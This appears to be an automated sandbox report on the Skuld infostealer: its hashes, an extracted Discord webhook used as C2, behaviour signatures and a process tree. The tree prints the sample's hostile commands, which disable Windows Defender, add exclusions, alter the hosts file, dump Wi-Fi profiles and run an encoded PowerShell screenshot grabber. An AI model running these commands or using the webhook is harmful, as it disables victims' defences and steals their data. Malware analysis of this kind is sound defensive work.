Analysis

  • max time kernel
    25s
  • max time network
    26s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-06-2024 07:38

General

  • Target

    megre.exe

  • Size

    4.0MB

  • MD5

    268e1c293401120cbf8cd6a84dccf2e9

  • SHA1

    5724512b69c6ce750a56fcb359d7cffd8de822fd

  • SHA256

    b29f7ff6aa3ad15cd643bd3fdd830d5ef9273d276ac122e581d2f9f5767d40d3

  • SHA512

    55c044142152a0930c49a7f216315540c0a31e51db5415916f9ba59480bf18c27318943f5549c20aa192145a64359b7c3d39aad59c33b272a75b34f1abb9ba63

  • SSDEEP

    98304:pIfqfMQC3igGnRrmOgkDV/OFYiT3rPNBWxBe2O:p8qIyvlm4p/OFNbf4eP

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1256150041513562143/LfrA9YKj_eB7YuAhTIl0O-spiEIkK-M3AYcBofAqSotskvUIB1bZRSbod7TXYgA7oLQp

Signatures

  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\megre.exe
    "C:\Users\Admin\AppData\Local\Temp\megre.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe"
          4⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            5⤵
            • Views/modifies file attributes
            PID:4808
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
            5⤵
            • Views/modifies file attributes
            PID:1504
          • C:\Windows\System32\Wbem\wmic.exe
            wmic csproduct get UUID
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3512
          • C:\Windows\System32\Wbem\wmic.exe
            wmic path win32_VideoController get name
            5⤵
            • Detects videocard installed
            • Suspicious use of AdjustPrivilegeToken
            PID:3968
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:3092
          • C:\Windows\System32\Wbem\wmic.exe
            wmic os get Caption
            5⤵
              PID:4112
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:2744
            • C:\Windows\System32\Wbem\wmic.exe
              wmic cpu get Name
              5⤵
                PID:4416
              • C:\Windows\system32\attrib.exe
                attrib -r C:\Windows\System32\drivers\etc\hosts
                5⤵
                • Drops file in Drivers directory
                • Views/modifies file attributes
                PID:2920
              • C:\Windows\System32\Wbem\wmic.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:872
              • C:\Windows\system32\attrib.exe
                attrib +r C:\Windows\System32\drivers\etc\hosts
                5⤵
                • Drops file in Drivers directory
                • Views/modifies file attributes
                PID:2296
              • C:\Windows\System32\Wbem\wmic.exe
                wmic csproduct get UUID
                5⤵
                  PID:3588
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profiles
                  5⤵
                  • Event Triggered Execution: Netsh Helper DLL
                  PID:2856
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:2292
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aqc5mt2r\aqc5mt2r.cmdline"
                    6⤵
                      PID:912
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F97.tmp" "c:\Users\Admin\AppData\Local\Temp\aqc5mt2r\CSC8A1C3858180F4AD1A6A4762DAF7B9A99.TMP"
                        7⤵
                          PID:3936
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat""
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3184
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1128
                    • C:\Windows\SysWOW64\cscript.exe
                      cscript /nologo /e:jscript "C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat"
                      5⤵
                        PID:2016
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat""
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4752
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat"
                      4⤵
                        PID:1820
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat""
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1072
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat"
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4432
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /im cmd.exe /f
                          5⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1152
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c "start /min "" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat""
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1868
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat"
                        4⤵
                          PID:2944

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    6d3e9c29fe44e90aae6ed30ccf799ca8

                    SHA1

                    c7974ef72264bbdf13a2793ccf1aed11bc565dce

                    SHA256

                    2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                    SHA512

                    60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    d8cb3e9459807e35f02130fad3f9860d

                    SHA1

                    5af7f32cb8a30e850892b15e9164030a041f4bd6

                    SHA256

                    2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                    SHA512

                    045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                  • C:\Users\Admin\AppData\Local\Temp\C8X6DOaqEg\Display (1).png

                    Filesize

                    426KB

                    MD5

                    1a70489852aa9266aed70b3c69d51a8c

                    SHA1

                    9f2526a3c52fe61080ce340647c3e1c0b61d6818

                    SHA256

                    70dfbadd136b16f92ef402de52c3169e5088d0d423f790dca8e5749f196178ed

                    SHA512

                    e5ee560023656c48dbfd73e179a0bedbd3b1a5957edb0692831f924ad7f197c48cfe051b1906ab0217252c4a6484071b18fcc20d0abdaffb6236daf74617cad8

                  • C:\Users\Admin\AppData\Local\Temp\RES4F97.tmp

                    Filesize

                    1KB

                    MD5

                    09eac8360f1967356bbf20d227928f5c

                    SHA1

                    85caaebc4f85a5fedd46bdec2941707f219cfaec

                    SHA256

                    fc7ddc362a71e812bdb61d2f66d027308ac778158e225adc3d0ae3f7916cba82

                    SHA512

                    644ecbbaf6a562048f627e3cfe778a6201ced8d3658e86ae5f59efab2c0058f7505de5a14e7cfe68cc09780513c3053b860ad8a32cedb068c816fe316397670c

                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat

                    Filesize

                    371KB

                    MD5

                    3d6307a885e46f705605cff9a4aa7dfc

                    SHA1

                    d39dec491bf22e6821856d523b45237bf2bf84ac

                    SHA256

                    83cc17a4d11fe7f62858e2ca7cc2c1a4ac12b930ab62812706467a145e9e08b9

                    SHA512

                    8735b7045e4bed5927f8791b041641288fb1bf02250c6957fe805381fbcb59f93b3f1f5042bc3f923b4faeb112badcc3614c7249b9df74b085b6881da49552f6

                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat

                    Filesize

                    516B

                    MD5

                    aa5e25d98df0583aec226c1a8231543a

                    SHA1

                    faea3e6eaa1f0ae725574c8c9d9dab662c5ae976

                    SHA256

                    35948b018277612a9803d0b52831d2412c66274047d24631e9d368b68b458f4f

                    SHA512

                    82c3bcac5b5d815829e35840fd6b08bf37687212f1d570beb9add77123e8cd5f81779d82e93c42e13f9e58f12697998de291f2741e42a5384005d4e62590abdf

                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.exe

                    Filesize

                    9.5MB

                    MD5

                    1be94157b0913505663b33e385fc661a

                    SHA1

                    7d0166709d002b7669ef738eee92b54d03959835

                    SHA256

                    1782797f8874cb105549a70054fd5dfe41b9e24c685602782119ff01c583a18c

                    SHA512

                    0798082cad2988ae649bf57cd58c41db6173b7119c42299bc94d67f8d163bdd0b34463da159dcd6c44bc940199c7a4fb56945559b83dc9b33538bb387287b61e

                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat

                    Filesize

                    54B

                    MD5

                    18ef03e1045b224a70d9afdf8247a241

                    SHA1

                    117b3959ded227b5cf0015229db0386f6479df70

                    SHA256

                    daf87ae302bcd7c7a65f6db2b93216116de0621169f724f564812a6a8614f33d

                    SHA512

                    2ef552283ed844801dc6b7a2ec143e1e52f77b6f7ee2516bb70b3c8db6592eaef9e435f063bbb94019ac135c2e37ccfcb9db8f926a7358c3590b3fc9c63beafd

                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat

                    Filesize

                    74B

                    MD5

                    b3be17a14609d812602af67da8b7acc2

                    SHA1

                    e1fcc3e3989ee6846694eba252622a336ce63795

                    SHA256

                    f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81

                    SHA512

                    780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7

                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat

                    Filesize

                    340B

                    MD5

                    6943c2eb7e78b8b8cb8171b940de20f2

                    SHA1

                    e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a

                    SHA256

                    eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095

                    SHA512

                    1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4v4lcgs3.2j2.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\aqc5mt2r\aqc5mt2r.dll

                    Filesize

                    4KB

                    MD5

                    fd72f3dcbf9cc3b0a2abf81c51337211

                    SHA1

                    cb44311b61fa6af94a8d07885f89fa1232574ebe

                    SHA256

                    5cbcc02ac5a24642d42344913a98edb391b4248978c5da8a58ab37d07ceb7219

                    SHA512

                    e1b76b7fe7e78f8767055da88ef975f65661aafb1429fabcdfaed75fdc30708bcee4525363105ab32f9dd41d311ce44c0c40e76065c9768d12ba511409017e5c

                  • C:\Windows\System32\drivers\etc\hosts

                    Filesize

                    2KB

                    MD5

                    6e2386469072b80f18d5722d07afdc0b

                    SHA1

                    032d13e364833d7276fcab8a5b2759e79182880f

                    SHA256

                    ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

                    SHA512

                    e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

                  • \??\c:\Users\Admin\AppData\Local\Temp\aqc5mt2r\CSC8A1C3858180F4AD1A6A4762DAF7B9A99.TMP

                    Filesize

                    652B

                    MD5

                    c1c3f91186fb6b6bc23e6c5d91bb5cd5

                    SHA1

                    c1f4e34ac6dc541716ae8e6b544aabe89605fb76

                    SHA256

                    fcd5cf5bb51413793558416d3d5681c308c2a1e89eec51cbfbcdf324cedc239f

                    SHA512

                    e90a74a65645da5e12d9e8b95e38f9d25557db61273351dbc02cbd36941a5a3877ff9b203112170241e33774796aff2b587ea9a300923d777e47d744d7dcf246

                  • \??\c:\Users\Admin\AppData\Local\Temp\aqc5mt2r\aqc5mt2r.0.cs

                    Filesize

                    1004B

                    MD5

                    c76055a0388b713a1eabe16130684dc3

                    SHA1

                    ee11e84cf41d8a43340f7102e17660072906c402

                    SHA256

                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                    SHA512

                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                  • \??\c:\Users\Admin\AppData\Local\Temp\aqc5mt2r\aqc5mt2r.cmdline

                    Filesize

                    607B

                    MD5

                    fef8e7b6c1dc37499c33129e92063124

                    SHA1

                    f8cd896bb35152766890bbee707515eac7b3aa9a

                    SHA256

                    8e34979e0d01d4d4b18cb892e095351664aeb4c0a231df3b9b27d8a9e7a4b5b5

                    SHA512

                    7e4decfc4a8aee6b224167f4e8ac64afa8d36d16011c23f2a876af3631bed047e8df0521c1d0a9dee786d514eb8ebbb540c4da981b48759c51e378547cfe8aec

                  • memory/2292-85-0x000001D942230000-0x000001D942238000-memory.dmp

                    Filesize

                    32KB

                  • memory/3092-36-0x00000147A4F20000-0x00000147A4F42000-memory.dmp

                    Filesize

                    136KB